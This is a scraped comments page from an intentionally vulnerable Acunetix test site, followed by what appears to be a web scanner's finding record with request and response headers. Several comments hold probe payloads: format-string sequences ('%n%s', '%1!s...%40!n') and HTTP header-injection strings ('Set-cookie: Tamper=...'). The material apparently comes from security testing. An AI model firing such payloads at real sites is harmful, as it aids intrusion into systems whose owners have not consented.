<td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 538 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:25 GMT Content-Length: 55888
Response Body - size: 55,888 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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